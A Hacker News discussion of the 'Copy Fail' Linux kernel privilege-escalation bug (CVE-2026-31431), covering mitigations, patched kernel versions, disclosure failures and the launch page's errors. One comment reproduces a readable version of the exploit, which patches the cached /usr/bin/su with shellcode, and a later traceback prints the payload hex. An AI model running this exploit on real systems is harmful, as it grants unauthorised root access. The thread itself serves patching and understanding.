Copy Fail (opens in new tab)

buredoranna1mo ago

Please don't rely on my judgement for this being safe for production, but after blacklisting the modules, the provided python exploit failed.

Check if the following are modules

  grep CONFIG_CRYPTO_USER_API /boot/config-$(uname -r)

If they are, you can try blacklisting them

  /etc/modprobe.d/blacklist-crypto-user-api.conf
  
  """
  blacklist af_alg
  blacklist algif_hash
  blacklist algif_skcipher
  blacklist algif_rng
  blacklist algif_aead

  install af_alg /bin/false
  install algif_hash /bin/false
  install algif_skcipher /bin/false
  install algif_rng /bin/false
  install algif_aead /bin/false
  """

  update-initramfs -u

Can anyone comment on the ramifications this?

ebiggers1mo ago

If iwd, or cryptsetup with certain non-default algorithms, isn't being used on the system, you should be fine. Not many programs use AF_ALG. It's possible there are others I'm not aware of, but it's quite rare.

To be clear, general-purpose Linux distros generally can't disable these kconfig options yet, due to these cases. But there are many Linux systems that simply don't need this functionality.

A good project for someone to work on would be to fix iwd and cryptsetup to always use userspace crypto, as they should.

strenholme1mo ago

I can’t comment on the ramifications, except to note that elsewhere in the thread this appears to not break anything (whether it makes userspace crypto a little less safe is academic, but that doesn’t matter if we have an easy local root shell), but I can verify the above fix does protect Ubuntu 24.04 from the exploit.

Just reboot after applying this change.

alpn1mo ago

For anyone wondering: AF_ALG is a Linux socket interface that exposes the kernel’s crypto API via file descriptors, using normal read(2)/write(2) calls for hashing and encryption.

dnnddidiej1mo ago

I wonder can the kernel just remove it and distros put on a compatiability layer.

https://blog.cloudflare.com/the-linux-kernel-key-retention-s...

l1k1mo ago

It does enable address space separation of secret keys from user space, which some people love:

https://www.youtube.com/watch?v=7djRRjxaCKk

https://www.youtube.com/watch?v=lvZaDE578yc

So it's not as simple as "should not exist". I agree though that there doesn't seem to be a valid need to expose authencesn to user space.

Disclosure: I'm co-maintaining crypto/asymmetric_keys/ in the kernel and the author/presenter in the first two links is another co-maintainer.

ebiggers1mo ago

That can be done in userspace too -- different userspace processes have different address spaces too.

The fact that the first link recommends using keyctl() for RSA private keys is also "interesting", given that the kernel's implementation of RSA isn't hardened against timing attacks (but userspace implementations of RSA typically are).

SeriousM1mo ago

I was completely unaware of https://syzbot.org, thanks for sharing!

> syzbot system continuously fuzzes main Linux kernel branches and automatically reports found bugs to kernel mailing lists. syzbot dashboard shows current statuses of bugs. All syzbot-reported bugs are also CCed to syzkaller-bugs mailing list. Direct all questions to syzkaller@googlegroups.com.

eqvinox1mo ago

The primary benefit of AF_ALG is IMHO when it's combined with kernel keyrings, i.e. ALG_SET_KEY_BY_KEY_SERIAL.

To steal from the sibling post:

It's even more than this: you can do crypto ops in user space without ever even having the key to begin with.

[Ed.: that said, maybe AF_ALG should be locked behind some CAP_*]

[Ed.#2: that said^2, I'm putting this one on authencesn, not AF_ALG. It's the extended sequence number juggling that went poorly, not AF_ALG at large. I bet this might even blow up in some strange hardware scenarios, "network packet on PCIe memory" or something like that - I'm speculating, though.]

ebiggers1mo ago

It doesn't seem to actually get used that way in practice. ALG_SET_KEY_BY_KEY_SERIAL didn't even appear until just a few years ago. And either way, if the interface allows you to overwrite the su binary, whether it theoretically could provide some other security benefit becomes kind of irrelevant.

angry_octet1mo ago

Better implemented as another user space process than in the kernel.

TZubiri1mo ago

YAGNI stocks are rising, Gentoo devs that compile their own kernel probably yeeted this module. Alpine, and MUSL deviants are probably immune to this downswing.

DRY looking very bearish, do repeat yourself, do build your own, do use userspace tools even if the kernel has its own version. Not as big a hit on the DRY philosophy as those pip and npm supply chain attacks last couple of weeks though.

KISS remains unaffected for the time being.

wolttam1mo ago

I love this. I think everyone in software should be feeling a tinge of “we should trim the fat” right now - get rid of as much of the old and infrequently used/tested code as we can. Push users towards the better tested alternatives.

dev_l1x_be1mo ago

Why is this available in the kernel on a box that does not use ipsec? should this be compile time enabled module instead than a generic solution?

tosti1mo ago

I think it would be reasonable to deprecate af_alg in favor of a character device. It's more accessible that way. The downside is that the maintainers hate adding new ioctls. I think that's fair. But I don't think a "regular" device node would cover the functionality userland expects.

That said, elsewhere ITT it's pointed out there are only a few use cases so far.

KnuthIsGod1mo ago

Removing this will make the friendly spooks at NSA very sad....

Fr0styMatt881mo ago

How did it get in? Isn’t Linus known for being rightfully fussy about what makes it into the kernel?

Would be an interesting story.

eqvinox1mo ago

Yeah, so, as we just learned (dirty.frag) the issue isn't algif_aead, it's authencesn and you can exploit it through plain network sockets rather than AF_ALG.

anabis1mo ago

Many things, such as ksmbd seems ill-advised when looked at from security. New AI driven exploits era will likely make projects more wary to adding functions.

WhyNotHugo1mo ago

iwd requires CONFIG_CRYPTO_USER_API_AEAD, so disabling this would break Wi-Fi for a lot of people.

sidewndr461mo ago

any idea what software this will break once I turn this kernel configuration off?

ebiggers1mo ago

iwd is the main culprit (for systems that use it instead of wpa_supplicant).

I think cryptsetup / LUKS also requires it with some non-default options. With the default options, it works fine with the kconfigs disabled.

There's not much else, as far as I know. Normally programs just use a userspace library instead, such as OpenSSL.

sharts1mo ago

If it should not exist what’s the rationale for keeping it instead of removing it?

400thecat1mo ago

can you please give me a real-life example of an application, on a typical linux laptop or typical linux server, which userspace application would use this CRYPTO_USER_API ? None that I looked at seem to use it: openssl, pgp, sha256sum

derefr1mo ago

It'd make a lot of sense to sandbox AF_ALG, then, wouldn't it? At least for userspace-driven invocations. Let the kernel keep its current code-path for kernel-driven invocations, but have the same code unit files also build some other sandboxed form, to be invoked by the crypto-accelerating syscalls.

If these syscalls are used by userspace as rarely as you say, the performance impact of this kind of sandboxing wouldn't matter much. And maybe there could be a KCONFIG/boot flag to switch back to using the un-sandboxed code path for userspace invocations too, for enterprises stuck with old software who really care.

---

My own thought process on how this could work below (but I'm not a kernel contributor, so you can probably immediately picture a design better than I can):

The naive way to do this, would be for the kernel build process to emit a separate AF_ALG userland IPC server as an additional build artifact; to get distros to package this IPC server as a component package of kernel packages; and to set up the sandboxed AF_ALG "kernel bridge" so that it proxies calls through to this IPC server if it exists, and errors out otherwise. (Basically like kfuse, except in this case the only "FUSE servers" are first-party.)

But that's a bit painful, organizationally. Puts a lot of work on the distro maintainers' shoulders, that they might just not bother doing. Prone to error. I think there are better alternatives.

1. Maybe the userland syscalls that rely on AF_ALG could instead ground out inside the kernel in a copy of AF_ALG that's been compiled to eBPF? Then that eBPF bytecode could just be embedded into the kernel.

2. Maybe the Linux kernel could consider a facility that would enable it to act as a hybrid microkernel (similar to macOS's XNU) — with arbitrary static sections of the kernel image/kernel modules [or perhaps standalone static ELF binaries embedded within kernel/kmod .data sections] being spawned not as supervisor-mode kthreads doing their own autonomous thing, but rather as unprivileged user-mode kernel threads, running as IPC-servers for the rest of the kernel to talk to?

- The rest of the kernel could talk to these "userspace kthreads" via some nonblocking IPC mechanism; but this mechanism wouldn't need to be exposed to userland the way macOS's XPC is; it could be kernel-to-kernel only (where these "userspace kthreads", despite being in userspace, are still fundamentally kernel threads, and so get to participate in it.)

- Also, these "userspace kthreads", when they're the active scheduled task, would have the kernel image's read-only sections [or their binary's sections, from within the kernel's .data section] mapped into their address space, since that's the binary they're executing against. But they wouldn't inherit [or the spawning mechanism would actively prune from their task struct] the rest of the kernel's mappings. So they'd have to either use the IPC mechanism, or use regular syscalls, to do anything with the kernel, just like any userspace task.)

[1] https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...

m3nu1mo ago

What other kernel modules would you suggest disabling that aren't used usually?

amluto1mo ago

IIRC some versions of cryptsetup require access to these APIs.

It doesn’t help that the historically dominant userspace implementation of most of this stuff was OpenSSL, which is also terrible.

smlacy1mo ago· 23 in thread

The fetishism of "byte count" (here, as "732 byte python script") needs to stop, especially when in a context like this where they're trying to illustrate a real failure modality.

Looking at their source code [1] it starts with this simple line:

import os as g,zlib,socket as s

And already I'm perplexed. "os as g"? but we're not aliasing "zlib as z"? Clearly this is auto-generated by some kind of minimizer? Likely because zlib is called only once, and os multiple times. As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.

Anyway, I could go on. :) Let's just stop fetishizing byte count

vitus1mo ago

Hilariously, "os as g" adds one more byte than it saves, since os is only used 4 times but the alias takes 5 extra bytes to save 4. And "socket as s" comes out even.

If you wanted real savings, you'd use "d=bytes.fromhex" instead of defining a function -- 17 bytes!! And d('00') -> b'\0' for -2 bytes.

We could easily get the byte count down further by using base64.b85decode instead of bytes.fromhex (-70 or so), but ultimately we're optimizing a meaningless metric, as you mention.

tptacek1mo ago

I don't get the 732-byte thing either and while I think it's a relatively punchy and unusually informative landing page for named vulnerability there are little snags like this all over it.

But the fact that it's not a kernel-exec LPE and it's reliable across kernels and distributions is important; it's close to the maximum "exploitability" you're going to see with an LPE. Which the page does communicate effectively; it just gilds the lily.

tylerni71mo ago

yeah... definitely a bit of a rush to get the landing page out after a long time in the disclosure process. The folks putting this all together have been working like mad (finding the bug, disclosing, working a lot on patching, writing up POCs and verifying exploitability in different scenarios) and stayed up really late to finish up the landing page, which led to a lot of minor issues.

But the bug is real and people should patch :)

For the size: sometimes people will shove in kilobytes of offset tables or something into an exploit, so it'll fingerprint and then look up details to work. This is much smaller because it doesn't need any of that, which is important for severity. (I agree the "golf" nature is a bit of an aside, kind of like pwn2own exploits taking "10 seconds")

debo_1mo ago

I don't see it as fetishizing byte count. I think of it as a proxy measure for how complicated or uncomplicated the exploit might be. They could just as well have said "we can do it in 3 lines of python" or "the Shannon entropy of the script implementing the exploit is really small" and I would have interpreted it similarly.

Where do you see this "fetishizing" happening most often? It's a strange thing to counter-fetishize about.

layer81mo ago

> I think of it as a proxy measure for how complicated or uncomplicated the exploit might be.

From a Busy Beaver, 256-bytes compo, or Dwitter perspective, 732 bytes isn’t really that meaningful.

And the sample exploit is even optimizing the byte size by using zlib compression, which doesn’t make much sense for the purpose. It just emphasizes the byte count fetishization.

refulgentis1mo ago

It's just lazy AI* writing w/0 editing.

"Just" is doing a lot of work there, I'm so annoyed reading it.

It's like an anti-ad and they had pretty cool material to work with.

* Claude loves stacatto "Some numeric figure. Something else. Intensifier" (ex. the "exploitable for a decade." or whatever sentences)

bonzini1mo ago

Completely without editing, to the point of hallucinating a RHEL version (14.3) that doesn't exist.

tjbecker1mo ago

I recommend reading the technical writeup https://xint.io/blog/copy-fail-linux-distributions

https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe...

xmcp1231mo ago

Glad I’m not alone. The whiplash from “oh, python I can read this” to “what the hell does that do” was jarring.

Assuming AI was correct, it unpacks more or less like this

import os, zlib, socket

AF_ALG = 38

SOCK_SEQPACKET = 5

SOL_ALG = 279

def hex_bytes(x):

    return bytes.fromhex(x)

def trigger(fd, offset, patch4):

    sock = socket.socket(AF_ALG, SOCK_SEQPACKET, 0)

    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

    sock.setsockopt(SOL_ALG, 1, hex_bytes("0800010000000010" + "0" * 64))

    sock.setsockopt(SOL_ALG, 5, None, 4)

    op, _ = sock.accept()

    length = offset + 4

    zero = b"\x00"

    op.sendmsg(

        [b"A" * 4 + patch4],

        [

            (SOL_ALG, 3, zero * 4),

            (SOL_ALG, 2, b"\x10" + zero * 19),

            (SOL_ALG, 4, b"\x08" + zero * 3),

        ],

        32768,

    )

    read_pipe, write_pipe = os.pipe()

    os.splice(fd, write_pipe, length, offset_src=0)

    os.splice(read_pipe, op.fileno(), length)

    try:

        op.recv(8 + offset)

    except:

        pass

target = os.open("/usr/bin/su", os.O_RDONLY)

payload = zlib.decompress(bytes.fromhex("..."))

offset = 0

while offset < len(payload):

    trigger(target, offset, payload[offset:offset + 4])

    offset += 4

os.system("su")

embedding-shape1mo ago

> I would absolutely never approve review of any code that used this.

How often do you review, and subsequently block the release, of PoCs in this sort of context? Sounds like you've faced this a lot.

I always thought code quality mattered less in those, as long as you communicate the intent.

Xirdus1mo ago

If you have a choice between posting minimized exploit code, and posting regular exploit code, posting minimized code is virtually always the wrong choice.

If you have a choice between pointing out the byte size of the exploit, and not pointing out the byte size of the exploit, pointing it out is virtually always the wrong choice.

In both cases, doing the right thing is less work. So somebody is going the extra way to ensure they are doing it wrong. If they didn't care, they'd end up doing it right by default.

nvme0n1p11mo ago

> as long as you communicate the intent

How does "import os as g" communicate the intent? How does hiding the payload behind zlib communicate the intent? This is the opposite: obfuscating the intent, so they can brag about 732 bytes instead of 846 bytes (or whatever it might have been).

It would have been less work for everyone involved to just release the unminified source.

opello1mo ago

While not formally reviewing code like this, I read a lot of it for fun. When it's clear and understandable, it's more educational and enjoyable. If the PoC code can also serve as a means of communication, that seems like an extra win.

tensegrist1mo ago

llms love that though

"The honest solution: a clean 50-line cut" and so on, ad nauseam

rts_cts1mo ago

I started to take the exploit script apart and reformat it to be something readable. At about 1041 bytes it's actually readable. The heart of it also includes an encoded zlib compressed blob that's 180 bytes long ('78daab77...'). This is decompressed (zlib.decompress(d(BLOB)) to a 160 byte ELF header.

infogulch1mo ago

While I agree that it doesn't make much sense to use a minimizer on code the reader could understand, the code-golfed byte count of a CVE repro communicates its complexity in a certain visceral way.

flourflour1mo ago

You're supposed to add "as a senior engineer" so we know you're 3 years out of bootcamp and can program in 1.25 languages. Or "as a staff..." if you've given an interview, know what 'make' is ("it's a command!") and are willing to do absolutely anything for the CTO.

fragmede1mo ago

> Anyway, I could go on.

Then go on. zlib is only used once, so "zlib as z" in exchange for using z once doesn't get you anything. Using os directly and not renaming it g saves you 2 bytes though. But in this age where AI outputs reams of code at the drop of a hat, why shouldn't we enjoy how small you can get it to pop a root shell?

edit: If we drop offset_src=0 and just pass in 0 positionally, it comes down to 720.

Banditoz1mo ago

>...why shouldn't we enjoy how small you can get it to pop a root shell?

Because I want to know what the exploit is doing and how it works, and if it's even safe to run.

A privesc PoC is NOT the place for this kind of fun.

ok1234561mo ago

This is pretty legible compared to the 90s C rootshell.org exploits.

john_strinlai1mo ago

>As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.

lucky for them, its an exploit script, not enterprise code.

all that needs to be "reviewed" is whether or not it exploits the thing its supposed to.

edit: yall really think a 10-line proof of concept script needs to undergo a code review? wild. i shouldnt be surprised that the top comment on a cool LPE exploit is complaining about variable naming

StableAlkyne1mo ago

It's just sloppy. Readers are human, and little mistakes like this take away from the article. Then you add a nonexistent RHEL version, and it just isn't a good look. Which is a shame, because it's otherwise a very interesting vuln.

Maybe you didn't care, but the length of this comment chain clearly shows that it matters. Effective communication is just as important as the engineering.

Xirdus1mo ago

I'd imagine that at minimum, the team in charge of patching the vulnerability would need to review how the exploit works.

progval1mo ago· 17 in thread

So this replaces a SUID binary, in order to run as PID 0. The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container (or specifically, a user namespace).

I ran the exploit in rootless Podman, and predictably it doesn't escape the container.

They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine

john_strinlai1mo ago

>The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container

they state that the write-up is forthcoming. presumably there is some additional steps or modifications that will be detailed in the 'part 2'.

"Next: "From Pod to Host," how Copy Fail escapes every major cloud Kubernetes platform."

tjbecker1mo ago

This is correct. The container escape exploit and writeup is not yet released.

Twirrim1mo ago

> They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine

They've done themselves no favours at all with their write up.

It does seem legitimate (I was able to use the PoC on a 24.04 instance), and seems like it should be a big deal, but the actual number of affected distributions seems way lower, and not even remotely as per their claim every distribution since 2017.

For example with Ubuntu, if I'm reading it right there's some impact in 16.04 (EOL), but then at least as per their analysis, only the vendor specific 6.17 kernels they ship that have it (e.g. linux-gcp, linux-oracle-6.7 etc.). That's a relatively new kernel version they started shipping recently, after it was released upstream last September.

x41321mo ago

i mean, it doesn't work on any SELinux, but it's still quite severe anyhow

layer81mo ago

The 2017 claim is based on the vulnerability having been introduced in this commit in the second half of 2017: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...

The details will depend on whether the kernel is a newer release or a maintenance version of an older release.

tardedmeme1mo ago

It overwrites bytes in memory of any file you can read. It's not hard to imagine how it could escape a lot of things.

rcxdude1mo ago

If you can get to real UID 0 from a rootless container, you can escape it, but you do need to take extra steps. Same with it working on Alpine: the underlying vulnerability probably still exists, but the script might need some adjusting. It's a PoC, not a full exploit for every situation.

CGamesPlay1mo ago

It's worth pointing out that you cannot, definitionally, get "real UID 0" in a "rootless" container, because then it wouldn't be a rootless container. This is relevant because this exploit doesn't claim to be able to bypass user namespaces, and that getting "real UID 0" would be a different exploit.

https://security-tracker.debian.org/tracker/CVE-2026-31431

amusingimpala751mo ago

Their PoC does as you say, but is built upon arbitrary modification of the page cache, which could be abused for the other things

progval1mo ago

Ah indeed, it can be used to overwrite the page cache for files on read-only volumes.

CGamesPlay1mo ago

Kubernetes 1.33 switches to user namespaces enabled by default, which I imagine is the same underlying mechanism that rootless Podman uses. `hostUsers: false` is the way to ensure that root in the pod is root on the host. It's trivial for a real (unmapped) root to escape a Kubernetes pod.

embedding-shape1mo ago

Did you try it on systems that don't have the patch already? Seems many distributions already shipped kernels with the patch ~a month ago.

progval1mo ago

Yes. Alpine in rootless Podman doesn't work (after replacing "/usr/bin/su" with "/bin/su" in the .py, running the .py just doesn't do anything) while it does in Debian in rootless Podman on the same host.

microtherion1mo ago

It also doesn't work on Raspberry Pi, though presumably it could easily be made to; it does replace the su binary, but the replacement is not executable.

unsnap_bicepsOP1mo ago

It's patching the binary in memory, so the binary patch would be architecture dependent. The existing one is only x86_64, but with an updated payload, it would work on arm.

x41321mo ago

this is because the `su` binary is replaced with x86 shellcode, replace it with aarch64 and it will work just the same.

x41321mo ago

there is a PoC floating around for Alpine.

xeeeeeeeeeeenu1mo ago· 15 in thread

It seems there was some kind of confusion during the disclosure process, because the vendors aren't treating this vulnerability as serious and it remains unpatched in many distros.

https://access.redhat.com/security/cve/cve-2026-31431 "Moderate severity", "Fix deferred"

https://www.suse.com/security/cve/CVE-2026-31431.html

MarleTangible1mo ago

Seems like distros consider it a medium risk because it doesn't involve remote code execution and requires local access. Though it allows local root privilege escalation which is considered high priority.

https://ubuntu.com/security/cves/about#priority

> Medium: A significant problem, typically exploitable for many users. Includes network daemon denial of service, cross-site scripting, and gaining user privileges.

oskarkk1mo ago

Strange that it's not classified as "high", which specifically includes "local root privilege escalations".

> High: A significant problem, typically exploitable for nearly all users in a default installation of Ubuntu. Includes serious remote denial of service, local root privilege escalations, local data theft, and data loss.

markhahn1mo ago

if your model is that linux is just about single-user desktops, this local exploit isn't too bad. or if your model is nothing but DB servers or the like.

mystifying to me that shared, multi-user machines are not thought of. for instance, I administer a system with 27k users - people who can login. even if only 1/10,000 of them are curious/malicious/compromised, we (Canadian national research HPC systems) are at risk. yes, this is somewhat uncommon these days, when shell access is not the norm.

but consider the very common sort of shared hosting environment: they typically provide something like plesk to interface to shared machines with no particular isolation. can you (as a website owner or 0wner) convince wordpress/etc to drop and execute a script? yep.

daveoc641mo ago

Ubuntu seems to have updated the page to say that it's a high priority now.

mghackerlady1mo ago

it's not like this couldn't be chained with some other exploit to get remote access to get remote root access which seems like a bit of an issue

staticassertion1mo ago

It was already known to attackers (or basically anyone watching) weeks ago when the patch hit the kernel but it wasn't communicated by upstream as a vuln (because Linus and Greg do not believe that vulnerabilities are conceptually relevant to the kernel).

still_grokking1mo ago

Will this continue like that even when the prophesied Mythos Vulnocalypse hits the Kernel?

This stance doesn't seem sustainable any more to me.

stefanor1mo ago

As far as we can tell, nobody disclosed it to the distributions, only to the kernel security team (who did not reach out to distributions). So the distributions are all scrambling now.

Good lesson in how not to do disclosure.

wangman1mo ago

RedHat has also changed it to "Important severity" and "Affected" now.

DooMMasteR1mo ago

Yeah, it was also staged for release on the affected kernel branches a while ago, but almost all still had the window open and only tonight got the merged across all maintained kernel versions.

It's not good... and surely not "responsible/planned" disclosure.

AntiUSAbah1mo ago

I'm schocked that ubuntu is aware of this and the prv lts is not patched yet :|

wtf

Tuna-Fish1mo ago

Yeah, by ubuntu's own guidelines linked on that page, this should be priority: high, but instead it's marked as medium.

no-name-here1mo ago

That was fixed, it’s now marked high.

Neil441mo ago

I thought that. surely people are going crazy right now owning anything with an our of date Wordpress exposed.

baggy_trough1mo ago

The upstream stable kernels (6.12.85, etc.) are out now with the fixes.

Lorin1mo ago· 10 in thread

What is the rationale behind naming CVEs and individual domains? Marketing?

diath1mo ago

It's an advertisement for their tool that found the exploit: https://copy.fail/#contact, https://xint.io/products/xint-code

john_strinlai1mo ago

can you remember what CVE-2021-44228 is without looking it up? CVE-2014-6271? CVE-2017-5753?

i bet if i told you their names, you would instantly know what vulns those are.

its easier to talk about things with names. it hurts no one. it takes approximately no effort or time.

CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.

QuantumNomad_1mo ago

> CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.

What, you guys talk about books based on their “title” instead of just memorising the ISBN of each book? Pssh, count me disappointed!

[1] https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb0...

tptacek1mo ago

It's certainly marketing, but it's prosocial: there's no scarcity of names, and "copy.fail" is much easier to remember and talk about than "CVE-2026-31431".

evanjrowley1mo ago

The AI generated prose screams marketing. Marketing is why there's a "Contact our Security Team" form at the bottom of the page.

skilled1mo ago

Probably to some extent it is marketing, but generally it has to do with significant bug finds to get the message out to the people who need to apply patches and/or be informed. Heartbleed, Log4Shell, etc.

Very few CVE’s get names dedicated to them like this, because usually when they do - it is very serious, as in this case.

eddythompson801mo ago

Giving catchy names for bad exploits has been a thing for a while. Probably to make sure it's easy to reference and make sure you're patches as opposed to passing numbers around. Heartbleed, Shellshock, BEAST, Goto Fail, etc

dgellow1mo ago

Yes, originally it was to help spread awareness. Now it has become more of a gimmick I would say

ronsor1mo ago

It makes sure people don't forget about the vulnerabilities, at least

Fuzzbit1mo ago

Same reason they name storms, numbers scare normies

rany_1mo ago· 9 in thread

Could this be used to root Android devices? Does Android ship with algif_aead?

alufers1mo ago

I rewrote it quickly to C [1] (and changed the embedded binary to be aarch64).

Unfortunately it fails on calling bind() on my device, so probalby Android doesn't ship with that kenrel module by default :(. So no freedom for my $40 phone.

Putting it out here, maybe somebody else will have better luck.

alufers1mo ago

Update: Checking the kernel config indeed confirms this.

   adb shell zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
   # CONFIG_CRYPTO_USER_API_HASH is not set
   # CONFIG_CRYPTO_USER_API_SKCIPHER is not set
   # CONFIG_CRYPTO_USER_API_RNG is not set
   # CONFIG_CRYPTO_USER_API_AEAD is not set

notpushkin1mo ago

I’ve poked around on my phone and it didn’t work:

    File "/data/data/com.termux/files/home/a.py", line 5, in c
      a=s.socket(38,5,0); # ...
    File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__
      _socket.socket.__init__(self, family, type, proto, fileno)
      ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  PermissionError: [Errno 13] Permission denied

int0x291mo ago

I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 8, in <module> f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) ^^^^^^^^^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

tripdout1mo ago

There’s SELinux, everything is mounted nosuid, barely anything runs as root except init. I doubt it.

angry_octet1mo ago

You don't need a suit binary for this, they have arbitrary write of memory. The suid binary is just a convenient and portable way to demonstrate it. Real exploits will use many different mechanisms.

zb31mo ago

Android is smarter than setuid + system partitions aren't writable.

firer1mo ago

System partitions being non-writable has nothing to do with the vulnerability - it allows modifying the cache of any file that you can open for reading.

Not using setuid anywhere means you'd have to build a slightly more clever exploit, but it's still trivial - just modify some binary you know will run as root "soon".

But... I didn't check, but IIRC the untrusted_app secontext that apps run in is not allowed to open AF_ALG sockets - so you can't directly trigger the vulnerability as a malicious app. Although it might be possible in some roundabout way (requesting some more privileged crypto service to do so).

int0x291mo ago

Its not writing to the partition though is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.

jesse_dot_id1mo ago· 7 in thread

Good thing nobody is silly enough to let fully autonomous AI agents run as regular users on these affected operating systems. That could be disastrous given a zero day prompt injection technique.

chromacity1mo ago

I don't see what the issue is, my agent is already running as root.

dnnddidiej1mo ago

Yeah it has all the government logins and full gmail access. It will be too busy to bother rooting the local machine!

ryandrake1mo ago

Good thing we haven't normalized installing things with curl | sh

still_grokking1mo ago

Yeah, that's great!

Imagine we would download random code from the internet and just execute it, like with NPM, PIP, Maven, Cargo etc.

https://docs.oracle.com/en/database/oracle/tuxedo/22/otxig/s...

dawnerd1mo ago

Or npm being allowed to run arbitrary post install scripts

Semaphor1mo ago

I don’t think that matters as it’s usually curl | sudo sh

FlyThruTheSun1mo ago

I literally ship an installer that runs with curl | bash... reading this thread while patching my servers is a fun experience lol

jzb1mo ago· 6 in thread

This is amazing. Page says it works on RHEL 14.3, which doesn’t exist. Current RHEL is 10.x, this must’ve been done in a TARDIS.

oskarkk1mo ago

14.3 seems to come from some Red Hat-specific GCC version, which can be reported as "gcc (GCC) 14.3.1 20250617 (Red Hat 14.3.1-2)". See these random examples I found by googling:

https://github.com/anthropics/claude-code/issues/40741 (gcc version "Red Hat 14.3" included in system version at the bottom)

bryanlarsen1mo ago

On the same line it says kernel version 6.12.0-124.45.1.el10_1. Which is RHEL 10. This is the kind of typo that humans make -- the hard to type numbers are accurate because they're cut and pasted, but the "easy" numbers have errors because they're not cut and pasted.

tylerni71mo ago

ugh sorry should be fixed. There was some scrambling to get more info together to explain the issue (and yes, obviously marketing), so there are some minor mistakes. Thanks for pointing it out!

justinclift1mo ago

> obviously marketing

Why marketing though?

https://x.com/i/status/2049687923814281351

cozzyd1mo ago

yeah, I assumed the whole thing was AI slop when I saw EL14...

tjbecker1mo ago

> and yes, RHEL 14.3 doesn't exist We meant to say RHEL 10.1. Sorry for the confusion!

hackernudes1mo ago· 5 in thread

LPE = local privilege escalation

Too many darn acronyms. This one wasn't too hard to figure out from context but I wish people would define acronyms before using them!

arcfour1mo ago

LPE is a very well-known acronym within the security community, it's not purely academic or obscure or anything.

I agree that it would be a good idea to define it explicitly when writing for a broader audience, but I don't think it's particularly egregious that they didn't. It's certainly something I could see myself forgetting.

Then again, the whole writeup appears to be AI-generated, so...

https://en.wikipedia.org/wiki/LPE

ButlerianJihad1mo ago

To be fair, I just consulted 3 cybersecurity glossaries (SANS.org, NIST CSRC, Huntress), and none of them list "LPE" nor "Local Privilege Escalation".

If you type "LPE" into English Wikipedia's search bar, and press "Enter", you'll be sent to a disambiguation page which contains a link to the relevant article.

jjordan1mo ago

Good writing for a broad audience requires it. Unfortunately the LLMs don't tend to adopt this guideline.

boston_clone1mo ago

it’s a CVE write up; the audience for these knows what an LPE is.

1970-01-011mo ago

I don't know why, but newer writers have never been taught to expand their acronyms on first use. I blame the US education system.

phreack1mo ago· 5 in thread

The page itself seems vibecoded and a bit of an advertisement, but it does look like the vulnerability is real and high risk. It does explain the big security update I just got, guess I'll prioritize updating today.

2001zhaozhao1mo ago

This is pretty obviously an advertisement but it's a pretty good advertisement imo, it pairs a meaningful contribution to the OSS ecosystem (discovering and patching a real bug) with selling your cybersecurity tool at the same time.

angry_octet1mo ago

These guys don't need to advertise, they are already 100% busy with work. But who wastes their time manually creating web pages? Especially kernel devs.

tkgally1mo ago

Side comment: I have recently used Claude Code to make a few sites for testing purposes. In the prompt I added "don't make it look vibe coded," and it worked pretty well: No purple gradients, bento box layouts, etc. Nothing spectacularly original, either, but probably enough to avoid accusations of vibe coding.

x41321mo ago

it's advertising their AI, not the talents of their humans :D

https://github.com/torvalds/linux/commit/a664bf3d603d

AntiUSAbah1mo ago

With vibe coding, html is a visualiation tool. not sure if i get your problem with that?

embedding-shape1mo ago· 5 in thread

For mitigation, the page currently basically just says:

> Update your distribution's kernel package to one that includes mainline commit a664bf3d603d

But it isn't very clear to me what Kernel version you can expect that to be in. For Arch/CachyOS, the patch seems to be included in 6.18.22+, 6.19.12+ and 7.0+. If you're on any of the lower versions in the same upstream stable series, you're likely vulnerable right now. Some distro kernels may include the fix in other versions, so check for your distribution.

nh21mo ago

On a git repo that has as remotes

    https://github.com/torvalds/linux.git
    https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git as remotes:

running a search for commit a664bf3d603d's commit message:

    git log --all --grep 'crypto: algif_aead - Revert to operating out-of-place' '--format=%H' | xargs -I '{}' git tag --contains '{}' | sort -u

outputs these tags as having the fix:

    v6.18.22
    v6.18.23
    v6.18.24
    v6.18.25
    v6.19.12
    v6.19.13
    v6.19.14
    v7.0
    v7.0.1
    v7.0.2
    v7.0-rc7
    v7.1-rc1

bombcar1mo ago

Here's the diff if you wanna play in your source (Gentoo, looking at you):

6.18.25-gentoo-x86_64 has the patch for Gentoo.

https://security-tracker.debian.org/tracker/CVE-2026-31431

rcxdude1mo ago

distros might also apply patches to their own packages, so this isn't a perfect signal (i.e. if you have one of those versions, you almost certainly have the fix, but if you don't, it might still be fixed but you'll need to check the distro's package information to know for sure).

kro1mo ago

Major os vendors will publish pages with the fixed versions:

Also, disabling algif_aead is suggested as mitigation

1p09gj20g8h1mo ago

Where are you seeing the disabling algif_aead mitigation?

